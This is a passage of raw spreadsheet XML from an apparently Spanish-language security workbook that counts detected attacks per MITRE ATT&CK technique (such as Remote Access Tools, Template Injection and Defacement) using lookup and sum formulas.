        <f t="shared" si="10"/>
        <v>290 (292)</v>
      </c>
      <c r="BR42" s="12">
        <v>4</v>
      </c>
      <c r="BS42" s="12">
        <v>6</v>
      </c>
      <c r="BT42" s="13">
        <v>1</v>
      </c>
      <c r="BU42" s="394">
        <v>283</v>
      </c>
      <c r="BV42" s="292">
        <v>2</v>
      </c>
      <c r="BW42" s="322">
        <v>2</v>
      </c>
      <c r="BX42" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY42" s="12">
        <v>2</v>
      </c>
      <c r="BZ42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="CA42" s="394">
        <v>2</v>
      </c>
      <c r="CB42" s="292">
        <v>12926</v>
      </c>
      <c r="CC42" s="322">
        <v>259</v>
      </c>
      <c r="CD42" s="322" t="str">
        <f t="shared" si="12"/>
        <v>259 (12926)</v>
      </c>
      <c r="CE42" s="12">
        <v>0</v>
      </c>
      <c r="CF42" s="12">
        <v>2</v>
      </c>
      <c r="CG42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CH42" s="394">
        <v>259</v>
      </c>
    </row>
    <row r="43" spans="1:86" ht="15" customHeight="1">
      <c r="A43" s="4">
        <f t="shared" si="13"/>
        <v>41</v>
      </c>
      <c r="B43" s="4" t="str">
        <f>IFERROR(VLOOKUP(A43,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1218</v>
      </c>
      <c r="C43" s="493" t="str">
        <f>IFERROR(VLOOKUP(B43,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Binary Proxy Execution</v>
      </c>
      <c r="D43" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B43)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E43" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F43" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G43" s="292">
        <v>0</v>
      </c>
      <c r="H43" s="322">
        <v>0</v>
      </c>
      <c r="I43" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J43" s="12">
        <v>0</v>
      </c>
      <c r="K43" s="13">
        <v>0</v>
      </c>
      <c r="L43" s="394">
        <v>0</v>
      </c>
      <c r="M43" s="322">
        <v>0</v>
      </c>
      <c r="N43" s="322">
        <v>0</v>
      </c>
      <c r="O43" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P43" s="12">
        <v>0</v>
      </c>
      <c r="Q43" s="13">
        <v>0</v>
      </c>
      <c r="R43" s="394">
        <v>0</v>
      </c>
      <c r="S43" s="409">
        <v>0</v>
      </c>
      <c r="T43" s="4">
        <v>0</v>
      </c>
      <c r="U43" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V43" s="4">
        <v>0</v>
      </c>
      <c r="W43" s="13">
        <v>0</v>
      </c>
      <c r="X43" s="394">
        <v>0</v>
      </c>
      <c r="Y43" s="392">
        <v>0</v>
      </c>
      <c r="Z43" s="392">
        <v>0</v>
      </c>
      <c r="AA43" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB43" s="392">
        <v>0</v>
      </c>
      <c r="AC43" s="16">
        <v>0</v>
      </c>
      <c r="AD43" s="394">
        <v>0</v>
      </c>
      <c r="AE43" s="392">
        <v>0</v>
      </c>
      <c r="AF43" s="392">
        <v>0</v>
      </c>
      <c r="AG43" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH43" s="392">
        <v>0</v>
      </c>
      <c r="AI43" s="16">
        <v>0</v>
      </c>
      <c r="AJ43" s="394">
        <v>0</v>
      </c>
      <c r="AK43" s="392">
        <v>0</v>
      </c>
      <c r="AL43" s="392">
        <v>0</v>
      </c>
      <c r="AM43" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN43" s="392">
        <v>0</v>
      </c>
      <c r="AO43" s="16">
        <v>0</v>
      </c>
      <c r="AP43" s="394">
        <v>0</v>
      </c>
      <c r="AQ43" s="292">
        <v>0</v>
      </c>
      <c r="AR43" s="322">
        <v>0</v>
      </c>
      <c r="AS43" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT43" s="12">
        <v>0</v>
      </c>
      <c r="AU43" s="13">
        <v>0</v>
      </c>
      <c r="AV43" s="394">
        <v>0</v>
      </c>
      <c r="AW43" s="392">
        <v>0</v>
      </c>
      <c r="AX43" s="392">
        <v>0</v>
      </c>
      <c r="AY43" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ43" s="4">
        <v>0</v>
      </c>
      <c r="BA43" s="16">
        <v>0</v>
      </c>
      <c r="BB43" s="394">
        <v>0</v>
      </c>
      <c r="BC43" s="292">
        <v>0</v>
      </c>
      <c r="BD43" s="322">
        <v>0</v>
      </c>
      <c r="BE43" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF43" s="12">
        <v>0</v>
      </c>
      <c r="BG43" s="13">
        <v>0</v>
      </c>
      <c r="BH43" s="394">
        <v>0</v>
      </c>
      <c r="BI43" s="292">
        <v>0</v>
      </c>
      <c r="BJ43" s="322">
        <v>0</v>
      </c>
      <c r="BK43" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL43" s="12">
        <v>0</v>
      </c>
      <c r="BM43" s="13">
        <v>0</v>
      </c>
      <c r="BN43" s="394">
        <v>0</v>
      </c>
      <c r="BO43" s="292">
        <v>1</v>
      </c>
      <c r="BP43" s="322">
        <v>1</v>
      </c>
      <c r="BQ43" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR43" s="12">
        <v>0</v>
      </c>
      <c r="BS43" s="12">
        <v>1</v>
      </c>
      <c r="BT43" s="13">
        <v>1</v>
      </c>
      <c r="BU43" s="394">
        <v>1</v>
      </c>
      <c r="BV43" s="292">
        <v>0</v>
      </c>
      <c r="BW43" s="322">
        <v>0</v>
      </c>
      <c r="BX43" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY43" s="12">
        <v>0</v>
      </c>
      <c r="BZ43" s="13">
        <v>0</v>
      </c>
      <c r="CA43" s="394">
        <v>0</v>
      </c>
      <c r="CB43" s="292">
        <v>1</v>
      </c>
      <c r="CC43" s="322">
        <v>1</v>
      </c>
      <c r="CD43" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE43" s="12">
        <v>0</v>
      </c>
      <c r="CF43" s="12">
        <v>1</v>
      </c>
      <c r="CG43" s="13">
        <v>1</v>
      </c>
      <c r="CH43" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:86" ht="15" customHeight="1">
      <c r="A44" s="4">
        <f t="shared" si="13"/>
        <v>42</v>
      </c>
      <c r="B44" s="4" t="str">
        <f>IFERROR(VLOOKUP(A44,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1219</v>
      </c>
      <c r="C44" s="493" t="str">
        <f>IFERROR(VLOOKUP(B44,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Access Tools</v>
      </c>
      <c r="D44" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B44)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E44" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>147</v>
      </c>
      <c r="F44" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (147)</v>
      </c>
      <c r="G44" s="292">
        <v>0</v>
      </c>
      <c r="H44" s="322">
        <v>0</v>
      </c>
      <c r="I44" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J44" s="12">
        <v>0</v>
      </c>
      <c r="K44" s="13">
        <v>0</v>
      </c>
      <c r="L44" s="394">
        <v>0</v>
      </c>
      <c r="M44" s="322">
        <v>0</v>
      </c>
      <c r="N44" s="322">
        <v>0</v>
      </c>
      <c r="O44" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P44" s="12">
        <v>0</v>
      </c>
      <c r="Q44" s="13">
        <v>0</v>
      </c>
      <c r="R44" s="394">
        <v>0</v>
      </c>
      <c r="S44" s="409">
        <v>0</v>
      </c>
      <c r="T44" s="4">
        <v>0</v>
      </c>
      <c r="U44" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V44" s="4">
        <v>0</v>
      </c>
      <c r="W44" s="13">
        <v>0</v>
      </c>
      <c r="X44" s="394">
        <v>0</v>
      </c>
      <c r="Y44" s="392">
        <v>44</v>
      </c>
      <c r="Z44" s="392">
        <v>30</v>
      </c>
      <c r="AA44" s="322" t="str">
        <f t="shared" si="3"/>
        <v>30 (44)</v>
      </c>
      <c r="AB44" s="392">
        <v>4</v>
      </c>
      <c r="AC44" s="16">
        <v>0.5</v>
      </c>
      <c r="AD44" s="394">
        <v>29</v>
      </c>
      <c r="AE44" s="392">
        <v>0</v>
      </c>
      <c r="AF44" s="392">
        <v>0</v>
      </c>
      <c r="AG44" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH44" s="392">
        <v>0</v>
      </c>
      <c r="AI44" s="16">
        <v>0</v>
      </c>
      <c r="AJ44" s="394">
        <v>0</v>
      </c>
      <c r="AK44" s="392">
        <v>44</v>
      </c>
      <c r="AL44" s="392">
        <v>30</v>
      </c>
      <c r="AM44" s="322" t="str">
        <f t="shared" si="5"/>
        <v>30 (44)</v>
      </c>
      <c r="AN44" s="392">
        <v>4</v>
      </c>
      <c r="AO44" s="16">
        <v>0.5</v>
      </c>
      <c r="AP44" s="394">
        <v>29</v>
      </c>
      <c r="AQ44" s="292">
        <v>0</v>
      </c>
      <c r="AR44" s="322">
        <v>0</v>
      </c>
      <c r="AS44" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT44" s="12">
        <v>0</v>
      </c>
      <c r="AU44" s="13">
        <v>0</v>
      </c>
      <c r="AV44" s="394">
        <v>0</v>
      </c>
      <c r="AW44" s="392">
        <v>0</v>
      </c>
      <c r="AX44" s="392">
        <v>0</v>
      </c>
      <c r="AY44" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ44" s="4">
        <v>0</v>
      </c>
      <c r="BA44" s="16">
        <v>0</v>
      </c>
      <c r="BB44" s="394">
        <v>0</v>
      </c>
      <c r="BC44" s="292">
        <v>0</v>
      </c>
      <c r="BD44" s="322">
        <v>0</v>
      </c>
      <c r="BE44" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF44" s="12">
        <v>0</v>
      </c>
      <c r="BG44" s="13">
        <v>0</v>
      </c>
      <c r="BH44" s="394">
        <v>0</v>
      </c>
      <c r="BI44" s="292">
        <v>3</v>
      </c>
      <c r="BJ44" s="322">
        <v>2</v>
      </c>
      <c r="BK44" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL44" s="12">
        <v>1</v>
      </c>
      <c r="BM44" s="13">
        <v>0.5</v>
      </c>
      <c r="BN44" s="394">
        <v>2</v>
      </c>
      <c r="BO44" s="292">
        <v>135</v>
      </c>
      <c r="BP44" s="322">
        <v>134</v>
      </c>
      <c r="BQ44" s="322" t="str">
        <f t="shared" si="10"/>
        <v>134 (135)</v>
      </c>
      <c r="BR44" s="12">
        <v>1</v>
      </c>
      <c r="BS44" s="12">
        <v>5</v>
      </c>
      <c r="BT44" s="13">
        <v>1</v>
      </c>
      <c r="BU44" s="394">
        <v>132</v>
      </c>
      <c r="BV44" s="292">
        <v>0</v>
      </c>
      <c r="BW44" s="322">
        <v>0</v>
      </c>
      <c r="BX44" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY44" s="12">
        <v>0</v>
      </c>
      <c r="BZ44" s="13">
        <v>0</v>
      </c>
      <c r="CA44" s="394">
        <v>0</v>
      </c>
      <c r="CB44" s="292">
        <v>0</v>
      </c>
      <c r="CC44" s="322">
        <v>0</v>
      </c>
      <c r="CD44" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE44" s="12">
        <v>0</v>
      </c>
      <c r="CF44" s="12">
        <v>0</v>
      </c>
      <c r="CG44" s="13">
        <v>0</v>
      </c>
      <c r="CH44" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:86" ht="15" customHeight="1">
      <c r="A45" s="4">
        <f t="shared" si="13"/>
        <v>43</v>
      </c>
      <c r="B45" s="4" t="str">
        <f>IFERROR(VLOOKUP(A45,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1221</v>
      </c>
      <c r="C45" s="493" t="str">
        <f>IFERROR(VLOOKUP(B45,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Template Injection</v>
      </c>
      <c r="D45" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B45)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E45" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>16</v>
      </c>
      <c r="F45" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (16)</v>
      </c>
      <c r="G45" s="292">
        <v>0</v>
      </c>
      <c r="H45" s="322">
        <v>0</v>
      </c>
      <c r="I45" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J45" s="12">
        <v>0</v>
      </c>
      <c r="K45" s="13">
        <v>0</v>
      </c>
      <c r="L45" s="394">
        <v>0</v>
      </c>
      <c r="M45" s="322">
        <v>1</v>
      </c>
      <c r="N45" s="322">
        <v>1</v>
      </c>
      <c r="O45" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P45" s="12">
        <v>1</v>
      </c>
      <c r="Q45" s="13">
        <v>1</v>
      </c>
      <c r="R45" s="394">
        <v>1</v>
      </c>
      <c r="S45" s="409">
        <v>1</v>
      </c>
      <c r="T45" s="4">
        <v>1</v>
      </c>
      <c r="U45" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V45" s="4">
        <v>1</v>
      </c>
      <c r="W45" s="13">
        <v>1</v>
      </c>
      <c r="X45" s="394">
        <v>1</v>
      </c>
      <c r="Y45" s="392">
        <v>7</v>
      </c>
      <c r="Z45" s="392">
        <v>7</v>
      </c>
      <c r="AA45" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (7)</v>
      </c>
      <c r="AB45" s="392">
        <v>2</v>
      </c>
      <c r="AC45" s="16">
        <v>1</v>
      </c>
      <c r="AD45" s="394">
        <v>7</v>
      </c>
      <c r="AE45" s="392">
        <v>3</v>
      </c>
      <c r="AF45" s="392">
        <v>3</v>
      </c>
      <c r="AG45" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH45" s="392">
        <v>3</v>
      </c>
      <c r="AI45" s="16">
        <v>1</v>
      </c>
      <c r="AJ45" s="394">
        <v>2</v>
      </c>
      <c r="AK45" s="392">
        <v>10</v>
      </c>
      <c r="AL45" s="392">
        <v>10</v>
      </c>
      <c r="AM45" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (10)</v>
      </c>
      <c r="AN45" s="392">
        <v>5</v>
      </c>
      <c r="AO45" s="16">
        <v>1</v>
      </c>
      <c r="AP45" s="394">
        <v>7</v>
      </c>
      <c r="AQ45" s="292">
        <v>0</v>
      </c>
      <c r="AR45" s="322">
        <v>0</v>
      </c>
      <c r="AS45" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT45" s="12">
        <v>0</v>
      </c>
      <c r="AU45" s="13">
        <v>0</v>
      </c>
      <c r="AV45" s="394">
        <v>0</v>
      </c>
      <c r="AW45" s="392">
        <v>0</v>
      </c>
      <c r="AX45" s="392">
        <v>0</v>
      </c>
      <c r="AY45" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ45" s="4">
        <v>0</v>
      </c>
      <c r="BA45" s="16">
        <v>0</v>
      </c>
      <c r="BB45" s="394">
        <v>0</v>
      </c>
      <c r="BC45" s="292">
        <v>1</v>
      </c>
      <c r="BD45" s="322">
        <v>1</v>
      </c>
      <c r="BE45" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF45" s="12">
        <v>1</v>
      </c>
      <c r="BG45" s="13">
        <v>1</v>
      </c>
      <c r="BH45" s="394">
        <v>1</v>
      </c>
      <c r="BI45" s="292">
        <v>2</v>
      </c>
      <c r="BJ45" s="322">
        <v>1</v>
      </c>
      <c r="BK45" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL45" s="12">
        <v>1</v>
      </c>
      <c r="BM45" s="13">
        <v>1</v>
      </c>
      <c r="BN45" s="394">
        <v>1</v>
      </c>
      <c r="BO45" s="292">
        <v>9</v>
      </c>
      <c r="BP45" s="322">
        <v>6</v>
      </c>
      <c r="BQ45" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (9)</v>
      </c>
      <c r="BR45" s="12">
        <v>1</v>
      </c>
      <c r="BS45" s="12">
        <v>5</v>
      </c>
      <c r="BT45" s="13">
        <v>1</v>
      </c>
      <c r="BU45" s="394">
        <v>6</v>
      </c>
      <c r="BV45" s="292">
        <v>0</v>
      </c>
      <c r="BW45" s="322">
        <v>0</v>
      </c>
      <c r="BX45" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY45" s="12">
        <v>0</v>
      </c>
      <c r="BZ45" s="13">
        <v>0</v>
      </c>
      <c r="CA45" s="394">
        <v>0</v>
      </c>
      <c r="CB45" s="292">
        <v>6</v>
      </c>
      <c r="CC45" s="322">
        <v>6</v>
      </c>
      <c r="CD45" s="322" t="str">
        <f t="shared" si="12"/>
        <v>6 (6)</v>
      </c>
      <c r="CE45" s="12">
        <v>0</v>
      </c>
      <c r="CF45" s="12">
        <v>1</v>
      </c>
      <c r="CG45" s="13">
        <v>1</v>
      </c>
      <c r="CH45" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="46" spans="1:86" ht="15" customHeight="1">
      <c r="A46" s="4">
        <f t="shared" si="13"/>
        <v>44</v>
      </c>
      <c r="B46" s="4" t="str">
        <f>IFERROR(VLOOKUP(A46,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1482</v>
      </c>
      <c r="C46" s="493" t="str">
        <f>IFERROR(VLOOKUP(B46,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="D46" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B46)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E46" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>4</v>
      </c>
      <c r="F46" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (4)</v>
      </c>
      <c r="G46" s="292">
        <v>0</v>
      </c>
      <c r="H46" s="322">
        <v>0</v>
      </c>
      <c r="I46" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J46" s="12">
        <v>0</v>
      </c>
      <c r="K46" s="13">
        <v>0</v>
      </c>
      <c r="L46" s="394">
        <v>0</v>
      </c>
      <c r="M46" s="322">
        <v>0</v>
      </c>
      <c r="N46" s="322">
        <v>0</v>
      </c>
      <c r="O46" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P46" s="12">
        <v>0</v>
      </c>
      <c r="Q46" s="13">
        <v>0</v>
      </c>
      <c r="R46" s="394">
        <v>0</v>
      </c>
      <c r="S46" s="409">
        <v>0</v>
      </c>
      <c r="T46" s="4">
        <v>0</v>
      </c>
      <c r="U46" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V46" s="4">
        <v>0</v>
      </c>
      <c r="W46" s="13">
        <v>0</v>
      </c>
      <c r="X46" s="394">
        <v>0</v>
      </c>
      <c r="Y46" s="392">
        <v>3</v>
      </c>
      <c r="Z46" s="392">
        <v>2</v>
      </c>
      <c r="AA46" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (3)</v>
      </c>
      <c r="AB46" s="392">
        <v>1</v>
      </c>
      <c r="AC46" s="16">
        <v>1</v>
      </c>
      <c r="AD46" s="394">
        <v>2</v>
      </c>
      <c r="AE46" s="392">
        <v>0</v>
      </c>
      <c r="AF46" s="392">
        <v>0</v>
      </c>
      <c r="AG46" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH46" s="392">
        <v>0</v>
      </c>
      <c r="AI46" s="16">
        <v>0</v>
      </c>
      <c r="AJ46" s="394">
        <v>0</v>
      </c>
      <c r="AK46" s="392">
        <v>3</v>
      </c>
      <c r="AL46" s="392">
        <v>2</v>
      </c>
      <c r="AM46" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (3)</v>
      </c>
      <c r="AN46" s="392">
        <v>1</v>
      </c>
      <c r="AO46" s="16">
        <v>1</v>
      </c>
      <c r="AP46" s="394">
        <v>2</v>
      </c>
      <c r="AQ46" s="292">
        <v>0</v>
      </c>
      <c r="AR46" s="322">
        <v>0</v>
      </c>
      <c r="AS46" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT46" s="12">
        <v>0</v>
      </c>
      <c r="AU46" s="13">
        <v>0</v>
      </c>
      <c r="AV46" s="394">
        <v>0</v>
      </c>
      <c r="AW46" s="392">
        <v>0</v>
      </c>
      <c r="AX46" s="392">
        <v>0</v>
      </c>
      <c r="AY46" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ46" s="4">
        <v>0</v>
      </c>
      <c r="BA46" s="16">
        <v>0</v>
      </c>
      <c r="BB46" s="394">
        <v>0</v>
      </c>
      <c r="BC46" s="292">
        <v>0</v>
      </c>
      <c r="BD46" s="322">
        <v>0</v>
      </c>
      <c r="BE46" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF46" s="12">
        <v>0</v>
      </c>
      <c r="BG46" s="13">
        <v>0</v>
      </c>
      <c r="BH46" s="394">
        <v>0</v>
      </c>
      <c r="BI46" s="292">
        <v>0</v>
      </c>
      <c r="BJ46" s="322">
        <v>0</v>
      </c>
      <c r="BK46" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL46" s="12">
        <v>0</v>
      </c>
      <c r="BM46" s="13">
        <v>0</v>
      </c>
      <c r="BN46" s="394">
        <v>0</v>
      </c>
      <c r="BO46" s="292">
        <v>2</v>
      </c>
      <c r="BP46" s="322">
        <v>2</v>
      </c>
      <c r="BQ46" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR46" s="12">
        <v>0</v>
      </c>
      <c r="BS46" s="12">
        <v>2</v>
      </c>
      <c r="BT46" s="13">
        <v>1</v>
      </c>
      <c r="BU46" s="394">
        <v>2</v>
      </c>
      <c r="BV46" s="292">
        <v>0</v>
      </c>
      <c r="BW46" s="322">
        <v>0</v>
      </c>
      <c r="BX46" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY46" s="12">
        <v>0</v>
      </c>
      <c r="BZ46" s="13">
        <v>0</v>
      </c>
      <c r="CA46" s="394">
        <v>0</v>
      </c>
      <c r="CB46" s="292">
        <v>0</v>
      </c>
      <c r="CC46" s="322">
        <v>0</v>
      </c>
      <c r="CD46" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE46" s="12">
        <v>0</v>
      </c>
      <c r="CF46" s="12">
        <v>0</v>
      </c>
      <c r="CG46" s="13">
        <v>0</v>
      </c>
      <c r="CH46" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:86" ht="15" customHeight="1">
      <c r="A47" s="4">
        <f t="shared" si="13"/>
        <v>45</v>
      </c>
      <c r="B47" s="4" t="str">
        <f>IFERROR(VLOOKUP(A47,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1491</v>
      </c>
      <c r="C47" s="493" t="str">
        <f>IFERROR(VLOOKUP(B47,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Defacement</v>
      </c>
      <c r="D47" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B47)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E47" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F47" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G47" s="292">
        <v>0</v>
      </c>
      <c r="H47" s="322">
        <v>0</v>
      </c>
      <c r="I47" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J47" s="12">
        <v>0</v>
      </c>
      <c r="K47" s="13">
        <v>0</v>
      </c>
      <c r="L47" s="394">
        <v>0</v>
      </c>
      <c r="M47" s="322">
        <v>1</v>
      </c>
      <c r="N47" s="322">
        <v>1</v>
      </c>
      <c r="O47" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P47" s="12">
        <v>1</v>
      </c>
      <c r="Q47" s="13">
        <v>1</v>
      </c>
      <c r="R47" s="394">
        <v>1</v>
      </c>
      <c r="S47" s="409">
        <v>1</v>
      </c>
      <c r="T47" s="4">
        <v>1</v>
      </c>
      <c r="U47" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V47" s="4">
        <v>1</v>
      </c>
      <c r="W47" s="13">
        <v>1</v>
      </c>
      <c r="X47" s="394">
        <v>1</v>
      </c>
      <c r="Y47" s="392">
        <v>1</v>
      </c>
      <c r="Z47" s="392">
        <v>1</v>
      </c>
      <c r="AA47" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB47" s="392">
        <v>1</v>
      </c>
      <c r="AC47" s="16">
        <v>1</v>
      </c>
      <c r="AD47" s="394">
        <v>1</v>
      </c>
      <c r="AE47" s="392">
        <v>2</v>
      </c>
      <c r="AF47" s="392">
        <v>2</v>
      </c>
      <c r="AG47" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH47" s="392">
        <v>2</v>
      </c>
      <c r="AI47" s="16">
        <v>1</v>
      </c>
      <c r="AJ47" s="394">
        <v>1</v>
      </c>
      <c r="AK47" s="392">
        <v>3</v>
      </c>
      <c r="AL47" s="392">
        <v>3</v>
      </c>
      <c r="AM47" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (3)</v>
      </c>
      <c r="AN47" s="392">
        <v>3</v>
      </c>
      <c r="AO47" s="16">
        <v>1</v>
      </c>
      <c r="AP47" s="394">
        <v>1</v>
      </c>
      <c r="AQ47" s="292">
        <v>0</v>
      </c>
      <c r="AR47" s="322">
        <v>0</v>
      </c>
      <c r="AS47" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT47" s="12">
        <v>0</v>
      </c>
      <c r="AU47" s="13">
        <v>0</v>
      </c>
      <c r="AV47" s="394">
        <v>0</v>
      </c>
      <c r="AW47" s="392">
        <v>0</v>
      </c>
      <c r="AX47" s="392">
        <v>0</v>
      </c>
      <c r="AY47" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ47" s="4">
        <v>0</v>
      </c>
      <c r="BA47" s="16">
        <v>0</v>
      </c>
      <c r="BB47" s="394">
        <v>0</v>
      </c>
      <c r="BC47" s="292">
        <v>1</v>
      </c>
      <c r="BD47" s="322">
        <v>1</v>
